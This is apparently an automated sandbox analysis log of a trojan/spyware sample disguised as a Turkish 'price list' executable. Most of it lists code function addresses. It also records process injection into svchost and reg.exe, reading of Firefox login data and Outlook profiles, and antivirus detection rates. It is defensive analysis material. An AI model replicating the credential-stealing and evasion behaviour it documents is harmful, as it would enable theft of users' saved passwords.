                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355A3524_2_0355A352
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035603E64_2_035603E6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034AE3F04_2_034AE3F0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035402744_2_03540274
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035202C04_2_035202C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035281584_2_03528158
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034901004_2_03490100
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0353A1184_2_0353A118
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035581CC4_2_035581CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035541A24_2_035541A2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035601AA4_2_035601AA
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035320004_2_03532000
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034C47504_2_034C4750
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A07704_2_034A0770
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0349C7C04_2_0349C7C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BC6E04_2_034BC6E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A05354_2_034A0535
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035605914_2_03560591
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035524464_2_03552446
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035444204_2_03544420
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0354E4F64_2_0354E4F6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355AB404_2_0355AB40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03556BD74_2_03556BD7
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0349EA804_2_0349EA80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034B69624_2_034B6962
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A29A04_2_034A29A0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0356A9A64_2_0356A9A6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A28404_2_034A2840
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034AA8404_2_034AA840
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034CE8F04_2_034CE8F0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034868B84_2_034868B8
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03514F404_2_03514F40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03542F304_2_03542F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034E2F284_2_034E2F28
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034C0F304_2_034C0F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03492FC84_2_03492FC8
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034ACFE04_2_034ACFE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0351EFA04_2_0351EFA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A0E594_2_034A0E59
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355EE264_2_0355EE26
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355EEDB4_2_0355EEDB
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355CE934_2_0355CE93
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034B2E904_2_034B2E90
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034AAD004_2_034AAD00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0353CD1F4_2_0353CD1F
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0349ADE04_2_0349ADE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034B8DBF4_2_034B8DBF
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A0C004_2_034A0C00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03490CF24_2_03490CF2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03540CB54_2_03540CB5
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0348D34C4_2_0348D34C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355132D4_2_0355132D
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034E739A4_2_034E739A
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BB2C04_2_034BB2C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035412ED4_2_035412ED
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A52A04_2_034A52A0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D516C4_2_034D516C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0348F1724_2_0348F172
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0356B16B4_2_0356B16B
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034AB1B04_2_034AB1B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A70C04_2_034A70C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0354F0CC4_2_0354F0CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355F0E04_2_0355F0E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035570E94_2_035570E9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355F7B04_2_0355F7B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034E56304_2_034E5630
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035516CC4_2_035516CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035575714_2_03557571
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035695C34_2_035695C3
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0353D5B04_2_0353D5B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034914604_2_03491460
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355F43F4_2_0355F43F
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FB764_2_0355FB76
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03515BF04_2_03515BF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034DDBF94_2_034DDBF9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BFB804_2_034BFB80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03557A464_2_03557A46
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FA494_2_0355FA49
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03513A6C4_2_03513A6C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0354DAC64_2_0354DAC6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034E5AA04_2_034E5AA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03541AA34_2_03541AA3
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0353DAAC4_2_0353DAAC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A99504_2_034A9950
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BB9504_2_034BB950
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_035359104_2_03535910
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0350D8004_2_0350D800
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A38E04_2_034A38E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FF094_2_0355FF09
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03463FD54_2_03463FD5
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03463FD24_2_03463FD2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A1F924_2_034A1F92
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FFB14_2_0355FFB1
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A9EB04_2_034A9EB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034A3D404_2_034A3D40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03551D5A4_2_03551D5A
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03557D734_2_03557D73
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034BFDC04_2_034BFDC0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_03519C324_2_03519C32
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0355FCF24_2_0355FCF2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C61D704_2_02C61D70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5AE504_2_02C5AE50
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5CE604_2_02C5CE60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5AF944_2_02C5AF94
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5AFA04_2_02C5AFA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5CC404_2_02C5CC40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5CC374_2_02C5CC37
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C636004_2_02C63600
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C654004_2_02C65400
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C635FB4_2_02C635FB
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C7BAD04_2_02C7BAD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_032AE2F44_2_032AE2F4
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_032AE7AC4_2_032AE7AC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_032AE4134_2_032AE413
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_032AD8784_2_032AD878
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125703734.0000000003BED000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1124816597.0000000003A43000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@17/12
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001FA06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001E81CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001FB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_0020EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001FC397 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_00194E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe File created: C:\Users\user\AppData\Local\Temp\autBBFD.tmp
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: reg.exe, 00000004.00000003.1462379918.0000000003060000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3579738318.000000000308C000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3579738318.00000000030AF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3579738318.0000000003081000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1462496606.0000000003081000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Virustotal: Detection: 36%
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe ReversingLabs: Detection: 50%
                Source: unknown Process created: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe"
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe"
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
                Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\reg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\reg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static file information: File size 1191936 > 1048576
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1123779592.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125102326.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1159403940.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1161483061.0000000003800000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1264498684.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.0000000003460000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1258534996.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1123779592.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125102326.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1258295138.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1159403940.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1161483061.0000000003800000.00000004.00000020.00020000.00000000.sdmp, reg.exe, reg.exe, 00000004.00000003.1264498684.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.0000000003460000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1258534996.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: reg.pdb source: svchost.exe, 00000002.00000003.1226391540.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1226340558.000000000341A000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1645977314.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1197869789.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.0000000003A8C000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000034DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1570677755.0000000034DBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.0000000003A8C000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000034DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1570677755.0000000034DBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: reg.pdbGCTL source: svchost.exe, 00000002.00000003.1226391540.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1226340558.000000000341A000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1645977314.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1197869789.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182664077.0000000000FFF000.00000002.00000001.01000000.00000004.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1341897315.0000000000FFF000.00000002.00000001.01000000.00000004.sdmp
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00194B37 LoadLibraryA,GetProcAddress,0_2_00194B37
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B8945 push ecx; ret 0_2_001B8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419140 pushfd ; retf 2_2_00419143
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414A08 push ss; retf 2_2_00414A0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AB7E push esi; iretd 2_2_0040AB8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033E0 push eax; ret 2_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AB83 push esi; iretd 2_2_0040AB8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415C43 push esp; ret 2_2_00415DA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414428 push esi; ret 2_2_0041442D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415D49 push esp; ret 2_2_00415DA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401500 push esp; retf D8DFh2_2_00401596
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418D0C push edi; ret 2_2_00418D1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418D13 push edi; ret 2_2_00418D1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411E1B push ds; ret 2_2_00411E23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401E2A pushfd ; ret 2_2_00401E55
